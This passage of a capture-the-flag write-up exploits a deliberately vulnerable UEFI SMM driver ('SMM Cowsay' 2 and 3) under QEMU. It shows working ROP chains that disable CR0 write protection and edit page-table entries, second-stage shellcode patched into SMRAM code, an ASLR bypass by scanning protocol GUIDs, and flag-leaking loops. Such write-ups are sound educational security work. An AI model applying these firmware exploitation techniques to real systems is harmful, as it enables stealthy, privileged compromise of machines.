0x7ee9304 <SmmCowsayHandler+833>: ret
So at the time of that last ret
we would have the registers spilled on the
stack a lot closer. Very conveniently, amongst the gadgets we dumped, there is a
ret 0x70
at VariableSmm.efi + 0x8a49
. We can use this gadget to to move RSP
exactly on top of the spilled R14, giving us the possibility to execute one
more gadget of the form pop rsp; ret
, which would get the new value for RSP
from the R15 value on the stack! After this, we fully control the stack and we
can write a longer ROP chain.
Writing the real ROP chain
After flipping the stack and starting the real ROP chain, we’ll need gadgets for:
- Setting CR0 in order to be able to disable
CR0.WP
to be able to edit the page table. - Write to memory at an arbitrary address to overwrite the page table entry for the flag address.
- Read from memory into a register to be able to get the flag.
All of these can be easily found with a bit of patience, since we have a lot of gadgets on our hands.
Since addresses don’t change, we don’t really need to worry about walking the
page table: we can just find the address of the page table entry for
0x44440000
once using GDB and then hardcode it in the exploit:
(gdb) set $lvl4_idx = (0x44440000 >> 12 + 9 + 9 + 9) & 0x1ff
(gdb) set $lvl3_idx = (0x44440000 >> 12 + 9 + 9) & 0x1ff
(gdb) set $lvl2_idx = (0x44440000 >> 12 + 9) & 0x1ff
(gdb) set $lvl1_idx = (0x44440000 >> 12) & 0x1ff
(gdb) set $lvl4_entry = *(unsigned long *)($cr3 + 8 * $lvl4_idx)
(gdb) set $lvl3_entry = *(unsigned long *)(($lvl4_entry & 0xffffffff000) + 8 * $lvl3_idx)
(gdb) set $lvl2_entry = *(unsigned long *)(($lvl3_entry & 0xffffffff000) + 8 * $lvl2_idx)
(gdb) set $lvl1_entry_addr = ($lvl2_entry & 0xffffffff000) + 8 * $lvl1_idx
(gdb) set $lvl1_entry = *(unsigned long *)$lvl1_entry_addr
(gdb) printf "PTE at 0x%lx, value = 0x%016lx\n", $lvl1_entry_addr, $lvl1_entry
PTE at 0x7ed0200, value = 0x8000000044440066
Notice how 0x8000000044440066
has bit 63 set (NX) set and bits 0 and 1 unset
(not present, not writeable). We need to set bit 0 in order to mark the page as
present, so the value we want is 0x8000000044440067
.
Checking the value of CR0 from GDB we get 0x80010033
: turning OFF the WP bit
gives us 0x80000033
, so this is what we want to write into CR0 before trying
to edit the page table entry at 0x7ed0200
.
After finding the gadgets we need, this is what the real ROP chain looks like:
ret_0x70 = 0x7F83000 + 0x8a49 # VariableSmm.efi + 0x8a49: ret 0x70
payload = 'A'.encode('utf-16-le') * 200 + p64(ret_0x70)
real_chain = [
# Unset CR0.WP
0x7f8a184 , # pop rax ; ret
0x80000033, # -> RAX
0x7fcf70d , # mov cr0, rax ; wbinvd ; ret
# Set PTE of flag page as present
# PTE at 0x7ed0200, original value = 0x8000000044440066
0x7f8a184 , # pop rax ; ret
0x7ed0200 , # -> RAX
0x7fc123d , # pop rdx ; ret
0x8000000044440067, # -> RDX
0x7fc9385 , # mov dword ptr [rax], edx ; xor eax, eax ;
# pop rbx ; pop rbp ; pop r12 ; ret
0x1337, # filler
0x1337, # filler
0x1337, # filler
# Read flag into RAX and then let everything chain
# crash to simply leak it from the register dump
0x7ee8222 , # pop rsi ; ret (do not mess up RAX with sub/add)
0x0 , # -> RSI
0x7fc123d , # pop rdx ; ret (do not mess up RAX with sub/add)
0x0 , # -> RDX
0x7ee82fe , # pop rdi ; ret
0x44440000, # -> RDI (flag address)
0x7ff7b2c , # mov rax, qword ptr [rdi] ; sub rsi, rdx ; add rax, rsi ; ret
]
Putting it all together
We can now write the real ROP chain into our allocated buffer (let’s say at
buffer + 0x800
just to be safe), load the gadget for flipping the stack into
R14, the address of the new stack (i.e. buffer + 0x800
) into R15, and go for
the kill.
# Transform real ROP chain into .quad directives to
# easyly embed it in the shellcode:
#
# .quad 0x7f8a184
# .quad 0x80000033
# ...
real_chain_size = len(real_chain) * 8
real_chain = '.quad ' + '\n.quad '.join(map(str, real_chain))
code = asm(f'''
/* Copy data into allocated buffer */
lea rsi, qword ptr [rip + data]
mov rdi, {buffer}
mov rcx, {0x18 + len(payload)}
cld
rep movsb
/* Copy real ROP chain into buffer + 0x800 */
lea rsi, qword ptr [rip + real_chain]
mov rdi, {buffer + 0x800}
mov rcx, {real_chain_size}
cld
rep movsb
/* Communicate(mSmmCommunication, buffer, NULL) */
mov rcx, {mSmmCommunication}
mov rdx, {buffer}
xor r8, r8
mov rax, {Communicate}
/* These two regs will spill on SMI stack */
mov r14, 0x7fe5269 /* pop rsp; ret */
mov r15, {buffer + 0x800} /* -> RSP */
call rax
test rax, rax
jnz fail
ret
fail:
ud2
real_chain:
{real_chain}
data:
.octa {gEfiSmmCowsayCommunicationGuid} /* Buffer->HeaderGuid */
.quad {len(payload)} /* Buffer->MessageLength */
/* payload will be appended here to serve as Buffer->Data */
''')
conn.sendline(code.hex().encode() + payload.hex().encode() + b'\ndone')
conn.interactive()
Result:
Running...
!!!! X64 Exception Type - 0D(#GP - General Protection) CPU Apic ID - 00000000 !!!!
ExceptionData - 0000000000000000
RIP - AFAFAFAFAFAFAFAF, CS - 0000000000000038, RFLAGS - 0000000000000002
RAX - 547B667463756975, RCX - 0000000000000000, RDX - 0000000000000000
...
Surely enough, that value in RAX decodes to uiuctf{T
, which is the test flag
provided in the handout/run/region4
file. We could find some more gadgets to
dump more bytes, and we could even try using IO ports to actually write the flag
out on the screen, but wrapping the exploit up into a function and running it a
couple more times seemed way easier to me (I was also not sure about how to
output to the screen, e.g. which function or which IO port to use).
flag = ''
for off in range(0, 0x100, 8):
chunk = expl(0x44440000 + off)
flag += chunk.decode()
log.success(flag)
if '}' in flag:
break
[*] Leaking 8 bytes at 0x44440000...
[+] uiuctf{d
[*] Leaking 8 bytes at 0x44440008...
[+] uiuctf{dont_try_
...
[*] Leaking 8 bytes at 0x44440030...
[+] uiuctf{dont_try_this_at_home_I_mean_at_work_5dfbf3eb}
SMM Cowsay 3
Full exploit: expl_smm_cowasy_3.py
We fired that engineer. Unfortunately, other engineers refused to touch this code, but instead suggested to integrate some ASLR code found online. Additionally, we hardened the system with SMM_CODE_CHK_EN and kept DEP on. Now that we have the monster combination of ASLR+DEP, we should surely be secure, right?
Things get a bit more complicated now, but honestly not that much. The code for
SmmCowsay.efi
is unchanged, so the vulnerability is still the same, but the
EDK2 and QEMU patches now apply two major modifications:
-
SMM_CODE_CHK_EN
has been enabled: this is a bit in theMSR_SMM_FEATURE_CONTROL
MSR, which controls whether SMM can execute code outside of the ranges defined by two other MSRs:IA32_SMRR_PHYSBASE
andIA32_SMRR_PHYSMASK
(basically outside SMRAM). The “Lock” bit ofMSR_SMM_FEATURE_CONTROL
is also set in QEMU when settingSMM_CODE_CHK_EN
, so this check cannot be disabled.This isn’t really a problem since we weren’t really executing any code outside SMRAM. We can already get what we want with a simple ROP chain that utilizes code already present in SMRAM, assuming we find the right gadgets.
-
ASLR has been added to EDK2 (original patches from jyao1/SecurityEx with some slight changes): now every single driver is loaded at a different address that changes each boot, with 10 bits of entropy taken using the
rdrand
instruction. Needless to say, this makes using hardcoded addresses like we did for the previous exploit impossible.
Exploitation
Defeating ASLR
How do we leak some SMM address in order to defeat ASLR? Well, there are a bunch
of protocols registered by EDK2 drivers. Each protocol has its own GUID, and
calling BootServices->LocateProtocol
with a valid GUID will return a pointer
to the protocol struct (if present), which resides in the driver implementing
the protocol! This allows us to leak the base address (after a simple
subtraction) of any driver implementing a protocol that is registered at the
time of the execution of our code.
If we take a look at the file MdePkg/MdePkg.dec
in the EDK2
source code we have a bunch of GUIDs for different protocols. Without even
wasting time inspecting other parts of the source code, we can dump them all and
try requesting every single one of them, until we find an address that looks
interesting.
Again, patching the run.sh
script to let QEMU dump EDK2 debug output to a file
like we did for SMM Cowsay 2, we can find SMBASE, which I assumed as the start
address of SMRAM when writing the exploit. In theory, SMRAM can expand before
and after SMBASE, which according to Intel Doc just marks the base address used
to find the entry point for the SMI handler and the save state area.
CPU[000] APIC ID=0000 SMBASE=07FAF000 SaveState=07FBEC00 Size=00000400
Now, using the same code we used for both the previous challenges, we can check
every single protocol GUID listed in MdePkg/MdePkg.dec
and see if the address
returned is after SMBASE:
with open('debug.log') as f:
for line in f:
if line.startswith('CPU[000] APIC ID=0000 SMBASE='):
smbase = int(line[31:31 + 8], 16)
# Manually or programmatically extract GUIDs from MdePkg/MdePkg.dec
for guid in guids:
code = asm(f'''
/* LocateProtocol(&guid, NULL, &protocol) */
lea rcx, qword ptr [rip + guid]
xor rdx, rdx
lea r8, qword ptr [rip + protocol]
mov rax, {LocateProtocol}
call rax
test rax, rax
jnz fail
mov rax, qword ptr [rip + protocol]
ret
fail:
ud2
guid:
.octa {guid}
protocol:
''')
conn.sendline(code.hex().encode() + b'\ndone')
conn.recvuntil(b'RAX: 0x')
proto = int(conn.recvn(16), 16)
if proto > smbase:
log.info('Interesting protocol: GUID = 0x%x, ADDR = 0x%x', guid, proto)
Surely enough, by letting the script run for enough time, we find that
gEfiSmmConfigurationProtocolGuid
returns a pointer to a protocol at a nice
address. Looking at the debug.log
for loaded drivers we can see that this
address is inside the PiSmmCpuDxeSmm.efi
SMM driver, and a simple subtraction
gives us its base address.
Finding ROP gadgets
Now we can take a look at the gadgets in PiSmmCpuDxeSmm.efi
. As it turns out,
we were lucky enough:
- Looking from GDB, we still have R13, R14 and R15 spilled on the SMI stack at the exact same offset.
- We can move the stack pointer forward:
ret 0x6d
- We can flip the stack:
pop rsp; ret
- We can pop RAX and other registers:
pop rax ; pop rbx ; pop r12 ; ret
- We can set CR0:
mov cr0, rax ; wbinvd ; ret
- We have a write-what-where primitive:
mov qword ptr [rbx], rax ; pop rbx ; ret
We do not have a lot more nice gadgets to work with, so this time instead of
writing the entire exploit using ROP, after disabling CR0.WP, we will just use
the write-what-where gadget to overwrite a piece of .text
of
PiSmmCpuDxeSmm.efi
with a stage 2 shellcode, and then simply jump to it.
The only slightly annoying part is the ret 0x6d
gadget to move the stack
forward: it will result in a misaligned stack, landing in the 2 most significant
bytes of the R13 value spilled on the stack. This isn’t a real problem as
thankfully the CPU (or better, QEMU) does not seem to care about the unaligned
stack pointer. We’ll simply have to do some bit shifting to put values on the
stack nicely using R{13,14,15}.
# SmmConfigurationProtocol leaked using LocateProtocol(gEfiSmmConfigurationProtocolGuid)
PiSmmCpuDxeSmm_base = SmmConfigurationProtocol - 0x16210
PiSmmCpuDxeSmm_text = PiSmmCpuDxeSmm_base + 0x1000
log.success('SmmConfigurationProtocol @ 0x%x', SmmConfigurationProtocol)
log.success('=> PiSmmCpuDxeSmm.efi @ 0x%x', PiSmmCpuDxeSmm_base)
log.success('=> PiSmmCpuDxeSmm.efi .text @ 0x%x', PiSmmCpuDxeSmm_text)
new_smm_stack = buffer + 0x800
ret_0x6d = PiSmmCpuDxeSmm_base + 0xfc8a # ret 0x6d
flip_stack = PiSmmCpuDxeSmm_base + 0x3c1c # pop rsp ; ret
pop_rax_rbx_r12 = PiSmmCpuDxeSmm_base + 0xd228 # pop rax ; pop rbx ; pop r12 ; ret
mov_cr0_rax = PiSmmCpuDxeSmm_base + 0x10a7d # mov cr0, rax ; wbinvd ; ret
write_primitive = PiSmmCpuDxeSmm_base + 0x3b8f # mov qword ptr [rbx], rax ; pop rbx ; ret
payload = 'A'.encode('utf-16-le') * 200 + p64(ret_0x6d)
Second stage shellcode
As we just said we will make our ROP chain with a few gadgets that will write a
second stage shellcode into the .text
of PiSmmCpuDxeSmm.efi
and then jump to
it. This shellcode will have to walk the page table (this time we cannot
pre-compute the address of the PTE because of ASLR), set the present bit on the
PTE and then read the flag into (one or more) registers.
stage2_shellcode = asm(f'''
movabs rbx, 0xffffffff000
/* Walk page table */
mov rax, cr3
mov rax, qword ptr [rax]
and rax, rbx
mov rax, qword ptr [rax + 8 * 0x1]
and rax, rbx
mov rax, qword ptr [rax + 8 * 0x22]
and rax, rbx
mov rbx, rax
mov rax, qword ptr [rax + 8 * 0x40]
/* Set present bit */
or al, 1
mov qword ptr [rbx + 8 * 0x40], rax
/* Read flag and die so regs get dumped, GG! */
movabs rax, 0x44440000
mov rax, qword ptr [rax]
ud2
''')
Again, we can run the exploit multiple times changing that 0x44440000
to leak
8 bytes at a time and obtain the full flag.
Putting it all together
Now we can build the ROP chain and send the exploit in the same way we did for SMM Cowsay 2:
real_chain = [
# Unset CR0.WP
pop_rax_rbx_r12, # pop rax ; pop rbx ; pop r12 ; ret
0x80000033 , # -> RAX
0xdeadbeef , # filler
0xdeadbeef , # filler
mov_cr0_rax , # mov cr0, rax ; wbinvd ; ret
]
# Now that CR0.WP is unset, we can just patch SMM code and jump to it!
# Make the ROP chain write the stage 2 shellcode at PiSmmCpuDxeSmm_text
# 8 bytes at a time, then jump into it
for i in range(0, len(stage2_shellcode), 8):
chunk = stage2_shellcode[i:i + 8].ljust(8, b'\x90')
chunk = u64(chunk)
real_chain += [
pop_rax_rbx_r12 , # pop rax ; pop rbx ; pop r12 ; ret
chunk , # -> RAX
PiSmmCpuDxeSmm_text + i, # -> RBX
0xdeadbeef ,
write_primitive , # mov qword ptr [rbx], rax ; pop rbx ; ret
0xdeadbeef
]
real_chain += [PiSmmCpuDxeSmm_text]
# Transform real ROP chain into .quad directives to embed in the shellcode:
# .quad 0x7f8a184
# .quad 0x80000033
# ...
real_chain_size = len(real_chain) * 8
real_chain = '.quad ' + '\n.quad '.join(map(str, real_chain))
The asm of the code we send to the server is the same as for the previous
challenge, so I am leaving most of it out. The only thing that changes is that
we now have to do some math to put the gadget to flip the stack and the new
stack address in the right place since the ret 0x6d
will misalign the stack:
code = asm(f'''
/* ... */
movabs r13, {(flip_stack << 40) & 0xffffffffffffffff}
movabs r14, {((flip_stack >> 24) | (new_smm_stack << 40)) & 0xffffffffffffffff}
movabs r15, {new_smm_stack >> 24}
call rax
/* ... */
''')
Now just run the exploit in a loop as we did for SMM Cowsay 2 and leak the
entire flag: uiuctf{uefi_is_hard_and_vendors_dont_care_1403c057}
. GG!
GG to you too if you made it this far :O. All in all, this was very fun and interesting set of challenges that made me learn a lot about x86 SMM and UEFI. Hope you enjoyed the write-up.
Let us know what you think of this article on twitter @towerofhanoi or leave a comment below!